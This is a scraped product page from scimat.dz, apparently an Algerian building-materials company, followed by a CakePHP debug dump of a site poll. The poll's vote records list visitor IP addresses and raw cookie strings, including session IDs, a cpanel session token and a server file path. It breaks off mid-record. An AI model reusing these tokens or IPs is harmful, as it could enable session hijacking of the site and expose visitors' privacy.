<a href="https://scimat.dz//Produits/details/878836" > Tout Venant Confondu -TVC- 0/31.5 mm <br> </a>
</h3>
<a href="https://scimat.dz//Produits/details/878836" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611671534.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/59998" > Filler 0/0,063 mm <br> </a>
</h3>
<a href="https://scimat.dz//Produits/details/59998" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611671831.png" alt="">
</a>
</div>
</div>
</center>
</div>
<div class="footer">
<div class="s1">
<p class="title" >
Pour toute information complémentaire,
</p>
<div class="contacternous">
<div class="line"></div>
<p>
Contactez-nous
</p>
<div class="line"></div>
</div>
<div class="contactInfo">
<p> Tél : 033 85 13 00/ 26 72 Fax: +(213) 33 85 11 01 </p>
<p> E-mail : contact@scimat.dz </p>
<p> Adresse : 73 Bis, Rue Benflis, la Verdure, Batna 05000 </p>
</div>
</div>
<div class="s2">
<a style='background: #4267B2 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="https://www.facebook.com/scimat.dz ">
<i class="fab fa-facebook-f " aria-hidden="true"> </i>
</a>
<a style='background: linear-gradient(45deg, #405de6, #5851db, #833ab4, #c13584, #e1306c, #fd1d1d) !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="https://www.instagram.com/ ">
<i class="fab fa-instagram" aria-hidden="true"> </i>
</a>
<a style='background: #25D366 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="https://whatsapp.com ">
<i class="fab fa-whatsapp" aria-hidden="true"> </i>
</a>
<a style='background: #FF0000 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="http://www.youtube.com/@scimatgica ">
<i class="fab fa-youtube" aria-hidden="true"> </i>
</a>
<a style='background: #4267B2 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="linkedin.com/in/scimat ">
<i class="fab fa-linkedin" aria-hidden="true"> </i>
</a>
<a style='background: #4267B2 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="www.twitter.com/ScimatGica ">
<i class="fab fa-twitter" aria-hidden="true"> </i>
</a>
</div>
</div>
<script type="text/javascript" src="./js/slick.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$('.pageProduit__slider').slick({
autoplay: true,
infinite: true,
slidesToShow: 1,
slidesToScroll: 1,
accessibility: true,
autoplaySpeed: 2500,
focusOnSelect: false,
mobileFirst: true,
prevArrow:"<img class='a-left control-c prev slick-prev pageProdu_arrow' src='https://scimat.dz/img/icons/Blue Arrow 1.png' >",
nextArrow:"<img class='a-right control-c next slick-next pageProdu_arrow' src='https://scimat.dz/img/icons/Blue Arrow 2.png' >"
});
});
</script>
</div>'
$scripts_for_layout = ''
$title_for_layout = 'Produits'
$cakeDescription = 'CakePHP: the rapid development php framework'
$cakeVersion = 'CakePHP 2.10.22'
$j = (int) 0
$sondage = array(
'Sondage' => array(
'id' => '2',
'nom_fr' => 'Que pensez vous du site ?',
'nom_ara' => 'ما رأيك في الموقع؟',
'nom_en' => 'What do you think of the site ?',
'contenu_fr' => '',
'contenu_ara' => '<p><br />
</p>
',
'contenu_en' => '',
'active' => '1',
'nbr_vote' => '8569',
'created' => '2016-05-21 16:16:44'
),
'Proposition' => array(
(int) 0 => array(
'id' => '10',
'ip' => '',
'nbr_vote' => '1631',
'sondage_id' => '2',
'nom_fr' => 'Excellent',
'nom_ara' => 'ممتاز',
'nom_en' => 'Excellent'
),
(int) 1 => array(
'id' => '34',
'ip' => '',
'nbr_vote' => '933',
'sondage_id' => '2',
'nom_fr' => 'Bon',
'nom_ara' => 'جيد',
'nom_en' => 'Good'
),
(int) 2 => array(
'id' => '35',
'ip' => '',
'nbr_vote' => '5993',
'sondage_id' => '2',
'nom_fr' => 'Acceptable',
'nom_ara' => 'مقبول',
'nom_en' => 'Acceptable '
)
),
'Vote' => array(
(int) 0 => array(
'id' => '42',
'ip' => '105.96.51.75',
'ip1' => 'KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; CAKEPHP=34db81858eb487317dcbc91507ea2847',
'sondage_id' => '2'
),
(int) 1 => array(
'id' => '43',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=eaabc760698540b51c517fd0f5be8262',
'sondage_id' => '2'
),
(int) 2 => array(
'id' => '44',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=aa7f339c2ac0accdba73e45324171361',
'sondage_id' => '2'
),
(int) 3 => array(
'id' => '45',
'ip' => '105.96.51.75',
'ip1' => 'KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; CAKEPHP=d3aa5991738d6213b26b92db37dcd699',
'sondage_id' => '2'
),
(int) 4 => array(
'id' => '46',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=783c09f113137e6bb5365620b8463624',
'sondage_id' => '2'
),
(int) 5 => array(
'id' => '50',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=75b73c8ccf5e4994d568277d17033b08',
'sondage_id' => '2'
),
(int) 6 => array(
'id' => '51',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=b50b0209ec5cb45ac49192353fb05972',
'sondage_id' => '2'
),
(int) 7 => array(
'id' => '54',
'ip' => '105.96.51.75',
'ip1' => 'KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; CAKEPHP=ad4cadc02b28249e5b07bbf9d8355b56',
'sondage_id' => '2'
),
(int) 8 => array(
'id' => '56',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=75dca425585cd288ac0897552d6e3fad',
'sondage_id' => '2'
),
(int) 9 => array(
'id' => '57',
'ip' => '197.207.24.210',
'ip1' => 'CAKEPHP=886e0a897f40c76c0971ca5ae089c69f',
'sondage_id' => '2'
),
(int) 10 => array(
'id' => '59',
'ip' => '197.207.24.210',
'ip1' => 'CAKEPHP=4b73aa6210da9ec09103ebc0e833f97a',
'sondage_id' => '2'
),
(int) 11 => array(
'id' => '60',
'ip' => '197.207.24.210',
'ip1' => 'CAKEPHP=743bcb4632bb9138517322f50662473f',
'sondage_id' => '2'
),
(int) 12 => array(
'id' => '62',
'ip' => '105.96.51.75',
'ip1' => 'KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off',
'sondage_id' => '2'
),
(int) 13 => array(
'id' => '63',
'ip' => '105.96.51.75',
'ip1' => 'KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; CAKEPHP=72630fb5c7a1cfd0046dd98b9ca338f8',
'sondage_id' => '2'
),
(int) 14 => array(
'id' => '66',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=6499e5614d7893a01b69db912830e5fb',
'sondage_id' => '2'
),
(int) 15 => array(
'id' => '67',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=ggfiso7ct2u5ithtnja9evv8s5',
'sondage_id' => '2'
),
(int) 16 => array(
'id' => '72',
'ip' => '154.242.54.88',
'ip1' => 'CAKEPHP=l4btaerit6c52slk89951hlme5',
'sondage_id' => '2'
),
(int) 17 => array(
'id' => '74',
'ip' => '41.109.35.114',
'ip1' => 'CAKEPHP=v7hcf7008rjv231hfnmn1bc6e3',
'sondage_id' => '2'
),
(int) 18 => array(
'id' => '75',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=1sbmicrt5d3i7o4c70fbcm2n53',
'sondage_id' => '2'
),
(int) 19 => array(
'id' => '83',
'ip' => '154.241.202.202',
'ip1' => 'CAKEPHP=vfn11olb0jv7schmjl3atqi7m4',
'sondage_id' => '2'
),
(int) 20 => array(
'id' => '87',
'ip' => '66.249.93.93',
'ip1' => 'CAKEPHP=4dfo7jbuvr4v12sur5jlkj6pq2',
'sondage_id' => '2'
),
(int) 21 => array(
'id' => '95',
'ip' => '105.103.214.201',
'ip1' => 'CAKEPHP=o8s3t192o5ug9gocuqcj1rsd15',
'sondage_id' => '2'
),
(int) 22 => array(
'id' => '109',
'ip' => '105.96.51.75',
'ip1' => 'CAKEPHP=m69c6ph64mg2gfkbhkhg1srau6',
'sondage_id' => '2'
),
(int) 23 => array(
'id' => '116',
'ip' => '41.107.237.224',
'ip1' => 'CAKEPHP=n1nuhb5fq62o39kcg38if6bjd7',
'sondage_id' => '2'
),
(int) 24 => array(
'id' => '117',
'ip' => '41.107.237.224',
'ip1' => 'CAKEPHP=n1nuhb5fq62o39kcg38if6bjd7',
'sondage_id' => '2'
),
(int) 25 => array(
'id' => '124',
'ip' => '105.103.205.100',
'ip1' => 'CAKEPHP=im171tg5h9p5ofubgvd49kl0k0',
'sondage_id' => '2'
),
(int) 26 => array(
'id' => '125',
'ip' => '105.103.205.100',
'ip1' => 'CAKEPHP=im171tg5h9p5ofubgvd49kl0k0',
'sondage_id' => '2'
),
(int) 27 => array(
'id' => '129',
'ip' => '105.103.33.202',
'ip1' => 'CAKEPHP=10lr9dahnk63aumjlp0p81p532',
'sondage_id' => '2'
),
(int) 28 => array(
'id' => '142',
'ip' => '105.103.27.219',
'ip1' => 'CAKEPHP=psg0893t2hshg7gfn8937mgsm0',
'sondage_id' => '2'
),
(int) 29 => array(
'id' => '148',
'ip' => '129.45.125.16',
'ip1' => 'CAKEPHP=0e9lcke500ltv0or1f4an99o02',
'sondage_id' => '2'
),
(int) 30 => array(
'id' => '149',
'ip' => '129.45.125.16',
'ip1' => 'CAKEPHP=0e9lcke500ltv0or1f4an99o02',
'sondage_id' => '2'
),
(int) 31 => array(
'id' => '160',
'ip' => '105.111.83.111',
'ip1' => 'CAKEPHP=udd1sa3js01ec97btlv8bjju34',
'sondage_id' => '2'
),
(int) 32 => array(
'id' => '161',
'ip' => '105.111.83.111',
'ip1' => 'CAKEPHP=udd1sa3js01ec97btlv8bjju34',
'sondage_id' => '2'
),
(int) 33 => array(
'id' => '167',
'ip' => '105.103.7.204',
'ip1' => 'CAKEPHP=5obs23imcjoongafd8863lk2p4',
'sondage_id' => '2'
),
(int) 34 => array(
'id' => '179',
'ip' => '154.127.98.130',
'ip1' => 'CAKEPHP=bqung7cout7sgame0mk5874bq7',
'sondage_id' => '2'
),
(int) 35 => array(
'id' => '181',
'ip' => '154.127.97.34',
'ip1' => 'CAKEPHP=f25bil4jsqde2kqcool83pbv35',
'sondage_id' => '2'
),
(int) 36 => array(
'id' => '182',
'ip' => '154.127.97.34',
'ip1' => 'CAKEPHP=f25bil4jsqde2kqcool83pbv35',
'sondage_id' => '2'
),
(int) 37 => array(
'id' => '199',
'ip' => '105.103.235.106',
'ip1' => 'CAKEPHP=3kpsih9rvilm223ai7659qif81',
'sondage_id' => '2'
),
(int) 38 => array(
'id' => '202',
'ip' => '129.45.109.89',
'ip1' => 'CAKEPHP=du3oguenq02fjlgm8mg0a35r92',
'sondage_id' => '2'
),
(int) 39 => array(
'id' => '234',
'ip' => '105.103.34.174',
'ip1' => 'CAKEPHP=t4r6m7doeb4lcoea8kqki5vce1',
'sondage_id' => '2'
),
(int) 40 => array(
'id' => '241',
'ip' => '105.103.61.117',
'ip1' => 'CAKEPHP=vtjt5ad6sdojgkqcmrae99dgg5',
'sondage_id' => '2'
),
(int) 41 => array(
'id' => '245',
'ip' => '129.45.29.35',
'ip1' => 'CAKEPHP=1bmitfvurmr854fmoiqe05drs7',
'sondage_id' => '2'
),
(int) 42 => array(
'id' => '257',
'ip' => '105.103.59.64',
'ip1' => 'CAKEPHP=4erqkhn84k2g3apvs88408noj7',
'sondage_id' => '2'
),
(int) 43 => array(
'id' => '258',
'ip' => '105.103.59.64',
'ip1' => 'CAKEPHP=4erqkhn84k2g3apvs88408noj7',
'sondage_id' => '2'
),
(int) 44 => array(
'id' => '267',
'ip' => '105.103.77.252',
'ip1' => 'CAKEPHP=h8i23j1cqplie3ng0faa83s5c0',
'sondage_id' => '2'
),
(int) 45 => array(
'id' => '278',
'ip' => '105.111.85.175',
'ip1' => 'CAKEPHP=gh48a2cq6522g3mpb3tegcsh97',
'sondage_id' => '2'
),
(int) 46 => array(
'id' => '285',
'ip' => '105.108.101.14',
'ip1' => 'CAKEPHP=c4nc4hqn776dcjtn2mmhf1apn2',
'sondage_id' => '2'
),
(int) 47 => array(
'id' => '292',
'ip' => '66.249.93.93',
'ip1' => 'CAKEPHP=s7o0b36n4n7i4rpjcn10l2h3q6',
'sondage_id' => '2'
),
(int) 48 => array(
'id' => '293',
'ip' => '66.249.93.91',
'ip1' => 'CAKEPHP=s7o0b36n4n7i4rpjcn10l2h3q6',
'sondage_id' => '2'
),
(int) 49 => array(
'id' => '300',
'ip' => '105.108.23.129',
'ip1' => 'CAKEPHP=2fro4tir5lh1okah6162vektp7',
'sondage_id' => '2'
),
(int) 50 => array(
'id' => '304',
'ip' => '66.249.93.93',
'ip1' => 'CAKEPHP=0fv47aar3nc0ecth3u251f47j2',
'sondage_id' => '2'
),
(int) 51 => array(
'id' => '306',
'ip' => '66.249.93.91',
'ip1' => 'CAKEPHP=0fv47aar3nc0ecth3u251f47j2',
'sondage_id' => '2'
),
(int) 52 => array(
'id' => '584',
'ip' => '197.200.176.118',
'ip1' => 'ASPSESSIONIDCAQTDDAC=LBONACKCBCGKLEMFICPFFAMB; CAKEPHP=5kfpnkremou34kmik3suuqbfo4',
'sondage_id' => '2'
),
(int) 53 => array(
'id' => '594',
'ip' => '105.235.133.152',
'ip1' => 'CAKEPHP=g15lg407r4qlgkgb7kdag11rf2',
'sondage_id' => '2'
),
(int) 54 => array(
'id' => '595',
'ip' => '105.109.33.29',
'ip1' => 'CAKEPHP=veio6ei5vhhua5b3kfn9gch5v4',
'sondage_id' => '2'
),
(int) 55 => array(
'id' => '597',
'ip' => '66.249.81.95',
'ip1' => 'CAKEPHP=73ntg7numr3pf1pcfrjoanf0g7',
'sondage_id' => '2'
),
(int) 56 => array(
'id' => '598',
'ip' => '66.249.81.95',
'ip1' => 'CAKEPHP=73ntg7numr3pf1pcfrjoanf0g7',
'sondage_id' => '2'
),
(int) 57 => array(
'id' => '599',
'ip' => '105.108.114.157',
'ip1' => 'CAKEPHP=5cljtn8m5g0e283qp4sfljl6k7',
'sondage_id' => '2'
),
(int) 58 => array(
'id' => '600',
'ip' => '105.109.39.188',
'ip1' => 'CAKEPHP=kihboialo35aljdj9b5er5qio2',
'sondage_id' => '2'
),
(int) 59 => array(
'id' => '601',
'ip' => '105.109.39.188',
'ip1' => 'CAKEPHP=kihboialo35aljdj9b5er5qio2',
'sondage_id' => '2'
),
(int) 60 => array(
'id' => '602',
'ip' => '154.121.7.21',
'ip1' => 'CAKEPHP=vavtbs2atk5ddi7vk8tu29gs02',
'sondage_id' => '2'
),
(int) 61 => array(
'id' => '603',
'ip' => '197.26.82.92',
'ip1' => 'CAKEPHP=6a3tlehbjpf4fmf2qo3gihudl5',
'sondage_id' => '2'
),
(int) 62 => array(
'id' => '604',
'ip' => '105.109.46.110',
'ip1' => 'CAKEPHP=e37ttdeo756lqvcpdap4l4ggk7',
'sondage_id' => '2'
),
(int) 63 => array(
'id' => '605',
'ip' => '196.82.108.27',
'ip1' => 'CAKEPHP=25fkti97ckvq748vagdrase617',
'sondage_id' => '2'
),
(int) 64 => array(
'id' => '606',
'ip' => '105.235.134.168',
'ip1' => 'CAKEPHP=h7jftsb7v40slc95qh1v1d5jf2',
'sondage_id' => '2'
),
(int) 65 => array(
'id' => '607',
'ip' => '66.249.93.95',
'ip1' => 'CAKEPHP=k110sqn2giqv0cs6qa83kd5ap6',
'sondage_id' => '2'
),
(int) 66 => array(
'id' => '608',
'ip' => '154.121.7.11',
'ip1' => 'CAKEPHP=6rs2nl8je2tfffteo34hvuq982',
'sondage_id' => '2'
),
(int) 67 => array(
'id' => '609',
'ip' => '129.45.72.160',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 68 => array(
'id' => '610',
'ip' => '105.103.144.166',
'ip1' => 'CAKEPHP=pv4e2v1jisuis4dhsbmomhf4g6',
'sondage_id' => '2'
),
(int) 69 => array(
'id' => '611',
'ip' => '105.109.46.237',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 70 => array(
'id' => '612',
'ip' => '105.103.153.1',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 71 => array(
'id' => '613',
'ip' => '105.103.153.1',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 72 => array(
'id' => '614',
'ip' => '105.103.153.1',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 73 => array(
'id' => '615',
'ip' => '105.103.153.1',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 74 => array(
'id' => '616',
'ip' => '66.249.93.93',
'ip1' => 'CAKEPHP=aecruju43rbhsfrnv7se06q6n2',
'sondage_id' => '2'
),
(int) 75 => array(
'id' => '617',
'ip' => '66.249.93.93',
'ip1' => 'CAKEPHP=aecruju43rbhsfrnv7se06q6n2',
'sondage_id' => '2'
),
(int) 76 => array(
'id' => '618',
'ip' => '66.249.93.95',
'ip1' => 'CAKEPHP=aecruju43rbhsfrnv7se06q6n2',
'sondage_id' => '2'
),
(int) 77 => array(
'id' => '620',
'ip' => '66.249.93.95',
'ip1' => 'CAKEPHP=i3k24sah7jrfal00b80qonf8i3',
'sondage_id' => '2'
),
(int) 78 => array(
'id' => '621',
'ip' => '66.249.93.95',
'ip1' => 'CAKEPHP=i3k24sah7jrfal00b80qonf8i3',
'sondage_id' => '2'
),
(int) 79 => array(
'id' => '622',
'ip' => '197.200.176.118',
'ip1' => 'CAKEPHP=238kn1mtcfmcf8ck8lgh8edfa2',
'sondage_id' => '2'
),
(int) 80 => array(
'id' => '623',
'ip' => '197.200.176.118',
'ip1' => 'CAKEPHP=238kn1mtcfmcf8ck8lgh8edfa2',
'sondage_id' => '2'
),
(int) 81 => array(
'id' => '624',
'ip' => '41.111.176.177',
'ip1' => 'CAKEPHP=57272454c1e9a6818e6d73f0e2e9cf28',
'sondage_id' => '2'
),
(int) 82 => array(
'id' => '625',
'ip' => '41.111.176.177',
'ip1' => 'CAKEPHP=9f91967cd6b62402cc663d9b1bec3be0',
'sondage_id' => '2'
),
(int) 83 => array(
'id' => '626',
'ip' => '::1',
'ip1' => 'CAKEPHP=hghmveslat32k10qk04gmu1slp',
'sondage_id' => '2'
),
(int) 84 => array(
'id' => '627',
'ip' => '41.106.98.238',
'ip1' => 'CAKEPHP=67b28953a438dc8630c48863237eb0fc',
'sondage_id' => '2'
),
(int) 85 => array(
'id' => '628',
'ip' => '41.106.98.238',
'ip1' => 'CAKEPHP=5606016c20f8b2c9e12880c1b5913f02',
'sondage_id' => '2'
),
(int) 86 => array(
'id' => '629',
'ip' => '41.106.98.238',
'ip1' => 'CAKEPHP=9de1af0b2a329d08570528ce9783e036',
'sondage_id' => '2'
),
(int) 87 => array(
'id' => '630',
'ip' => '41.106.98.238',
'ip1' => 'CAKEPHP=7c97df81d5b517757983779f45fbcdef',
'sondage_id' => '2'
),
(int) 88 => array(
'id' => '631',
'ip' => '41.106.97.50',
'ip1' => 'CAKEPHP=00c6a42fe7c26b1b79508bec5ce73d87',
'sondage_id' => '2'
),
(int) 89 => array(
'id' => '632',
'ip' => '41.106.103.202',
'ip1' => 'CAKEPHP=ff512330ec170ca90df2456fc8718c8b',
'sondage_id' => '2'
),
(int) 90 => array(
'id' => '633',
'ip' => '41.106.99.192',
'ip1' => 'CAKEPHP=2d47749929c1828afe1840c519f22e65',
'sondage_id' => '2'
),
(int) 91 => array(
'id' => '634',
'ip' => '41.106.99.192',
'ip1' => 'CAKEPHP=9480d398295c60f3635a52acb4b8c65d',
'sondage_id' => '2'
),
(int) 92 => array(
'id' => '635',
'ip' => '41.106.98.142',
'ip1' => 'CAKEPHP=a108530286164b78afefb2874d95fd28',
'sondage_id' => '2'
),
(int) 93 => array(
'id' => '636',
'ip' => '41.106.100.91',
'ip1' => 'CAKEPHP=738539db19be0cbec3f3de498093cdff',
'sondage_id' => '2'
),
(int) 94 => array(
'id' => '637',
'ip' => '41.106.98.159',
'ip1' => 'CAKEPHP=4c8eae25a393f171eadd50cc2398cc62',
'sondage_id' => '2'
),
(int) 95 => array(
'id' => '638',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=a6ab6a7024f92c3ca1d98891b16a2a64',
'sondage_id' => '2'
),
(int) 96 => array(
'id' => '639',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=8b2e4a89c746ca2f7305f8ec585de95e',
'sondage_id' => '2'
),
(int) 97 => array(
'id' => '640',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=f95cb3d28380c5cf02388bb5f1a665e4',
'sondage_id' => '2'
),
(int) 98 => array(
'id' => '641',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=7e3f6b5fb19ffa0dd8646f092aaf82a8',
'sondage_id' => '2'
),
(int) 99 => array(
'id' => '642',
'ip' => '105.108.221.35',
'ip1' => 'CAKEPHP=164b08447989ea7e2d2a34ae891072dc',
'sondage_id' => '2'
),
(int) 100 => array(
'id' => '643',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=a531278d741683b47e3386c5311522f9',
'sondage_id' => '2'
),
(int) 101 => array(
'id' => '644',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=80aebd32803799b43050c03b6545bc54',
'sondage_id' => '2'
),
(int) 102 => array(
'id' => '645',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=1d2e0d8f2a67cd09fa3352a146a39027',
'sondage_id' => '2'
),
(int) 103 => array(
'id' => '646',
'ip' => '216.99.127.197',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 104 => array(
'id' => '647',
'ip' => '105.96.67.151',
'ip1' => 'KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; CAKEPHP=9f205cb394b89522ba0f2f678d773e7c',
'sondage_id' => '2'
),
(int) 105 => array(
'id' => '648',
'ip' => '5.127.53.243',
'ip1' => 'CAKEPHP=33bba61e209820824fc6b01317f986f7',
'sondage_id' => '2'
),
(int) 106 => array(
'id' => '649',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=1d8828d858ab31b2d2d1f43120d90d3b',
'sondage_id' => '2'
),
(int) 107 => array(
'id' => '650',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=1d8828d858ab31b2d2d1f43120d90d3b',
'sondage_id' => '2'
),
(int) 108 => array(
'id' => '651',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=1d8828d858ab31b2d2d1f43120d90d3b',
'sondage_id' => '2'
),
(int) 109 => array(
'id' => '652',
'ip' => '41.105.230.122',
'ip1' => 'CAKEPHP=7db0205cc2d10fd50ed7820be2defea3',
'sondage_id' => '2'
),
(int) 110 => array(
'id' => '653',
'ip' => '154.121.39.82',
'ip1' => 'CAKEPHP=9204bcbed06e504ea80245251076757d',
'sondage_id' => '2'
),
(int) 111 => array(
'id' => '654',
'ip' => '105.96.67.151',
'ip1' => 'roundcube_cookies=enabled',
'sondage_id' => '2'
),
(int) 112 => array(
'id' => '655',
'ip' => '105.96.67.151',
'ip1' => 'roundcube_cookies=enabled; CAKEPHP=b667e6604e0158b555c10b883d948843',
'sondage_id' => '2'
),
(int) 113 => array(
'id' => '656',
'ip' => '105.96.67.151',
'ip1' => 'roundcube_cookies=enabled; CAKEPHP=11f7ed57633720c099874614b3670b1d',
'sondage_id' => '2'
),
(int) 114 => array(
'id' => '657',
'ip' => '105.96.67.151',
'ip1' => 'roundcube_cookies=enabled; CAKEPHP=11f7ed57633720c099874614b3670b1d; timezone=Africa/Lagos; cpsession=scimat%3amuiHdKcqjbDTXrek%2c07ae1a0506bb6b83198d7d327ff7d250',
'sondage_id' => '2'
),
(int) 115 => array(
'id' => '658',
'ip' => '41.106.186.4',
'ip1' => 'CAKEPHP=bd800f11eb10b17fcabc6c5412367f31',
'sondage_id' => '2'
),
(int) 116 => array(
'id' => '659',
'ip' => '105.235.136.62',
'ip1' => 'CAKEPHP=baeb4a98668244b18a1c68545c0cfd86',
'sondage_id' => '2'
),
(int) 117 => array(
'id' => '660',
'ip' => '105.96.67.151',
'ip1' => 'roundcube_cookies=enabled; CAKEPHP=f190cef3dfe8a398e2b7bf2ddb36ce32',
'sondage_id' => '2'
),
(int) 118 => array(
'id' => '661',
'ip' => '105.96.64.70',
'ip1' => 'roundcube_cookies=enabled; CAKEPHP=1677b89117496da87d829b53ee0e087c',
'sondage_id' => '2'
),
(int) 119 => array(
'id' => '662',
'ip' => '197.200.7.219',
'ip1' => 'CAKEPHP=4bb43efcfb67f8caa99b153d8c13be1c',
'sondage_id' => '2'
),
(int) 120 => array(
'id' => '663',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=ba8ba3a4353026ccbadc055c04300b02',
'sondage_id' => '2'
),
(int) 121 => array(
'id' => '664',
'ip' => '105.96.67.151',
'ip1' => '<br />
<b>Notice</b>: Undefined index: HTTP_COOKIE in <b>/home/scimat/public_html/app/View/Layouts/default.ctp</b> on line <b>402</b><br />
',
'sondage_id' => '2'
),
(int) 122 => array(
'id' => '665',
'ip' => '105.105.93.141',
'ip1' => 'CAKEPHP=581d0dfb3ea139c223ff7cf6e4b2af9c',
'sondage_id' => '2'
),
(int) 123 => array(
'id' => '666',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=e7e4f29bde9bb695c0e774867b15dcaa',
'sondage_id' => '2'
),
(int) 124 => array(
'id' => '667',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=99c8ebe7d77905afcb2253a8c5040acb',
'sondage_id' => '2'
),
(int) 125 => array(
'id' => '668',
'ip' => '105.105.142.85',
'ip1' => 'CAKEPHP=3544c4a8ff39ac7b0e803ed91bdc0d46',
'sondage_id' => '2'
),
(int) 126 => array(
'id' => '669',
'ip' => '105.106.54.172',
'ip1' => 'CAKEPHP=de9db1d24574afe50f3c0983e9088260',
'sondage_id' => '2'
),
(int) 127 => array(
'id' => '670',
'ip' => '41.105.238.154',
'ip1' => 'CAKEPHP=0d14090a2dd8e044f04c96cd8bb782d3',
'sondage_id' => '2'
),
(int) 128 => array(
'id' => '671',
'ip' => '41.105.79.173',
'ip1' => 'CAKEPHP=0237c333a7e92a48abaedd4763dc9d1f',
'sondage_id' => '2'
),
(int) 129 => array(
'id' => '672',
'ip' => '197.117.27.12',
'ip1' => 'CAKEPHP=34d4edb7ef55f556267e7da7f0fdbb66',
'sondage_id' => '2'
),
(int) 130 => array(
'id' => '673',
'ip' => '41.62.43.243',
'ip1' => 'CAKEPHP=59ed5d71568bb5f8bd3ccaa00c5182e8',
'sondage_id' => '2'
),
(int) 131 => array(
'id' => '674',
'ip' => '41.62.43.243',
'ip1' => 'CAKEPHP=59ed5d71568bb5f8bd3ccaa00c5182e8',
'sondage_id' => '2'
),
(int) 132 => array(
'id' => '675',
'ip' => '41.62.43.243',
'ip1' => 'CAKEPHP=59ed5d71568bb5f8bd3ccaa00c5182e8',
'sondage_id' => '2'
),
(int) 133 => array(
'id' => '676',
'ip' => '105.106.94.113',
'ip1' => 'CAKEPHP=1a41a24cd9a2c7c675a95d89715657da',
'sondage_id' => '2'
),
(int) 134 => array(
'id' => '677',
'ip' => '41.106.170.125',
'ip1' => 'CAKEPHP=d5ff22be5cc0d5db3603351bc6cf25cb',
'sondage_id' => '2'
),
(int) 135 => array(
'id' => '678',
'ip' => '105.102.68.116',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 136 => array(
'id' => '679',
'ip' => '105.102.68.116',
'ip1' => 'CAKEPHP=57d52850fa18af8a2db1bdef42ea2ac1',
'sondage_id' => '2'
),
(int) 137 => array(
'id' => '680',
'ip' => '105.103.60.14',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 138 => array(
'id' => '681',
'ip' => '78.187.113.185',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 139 => array(
'id' => '682',
'ip' => '77.246.74.38',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 140 => array(
'id' => '683',
'ip' => '105.235.139.135',
'ip1' => 'CAKEPHP=464416ea058d4bed2330b6b7f2ed7f09',
'sondage_id' => '2'
),
(int) 141 => array(
'id' => '684',
'ip' => '105.99.204.114',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 142 => array(
'id' => '685',
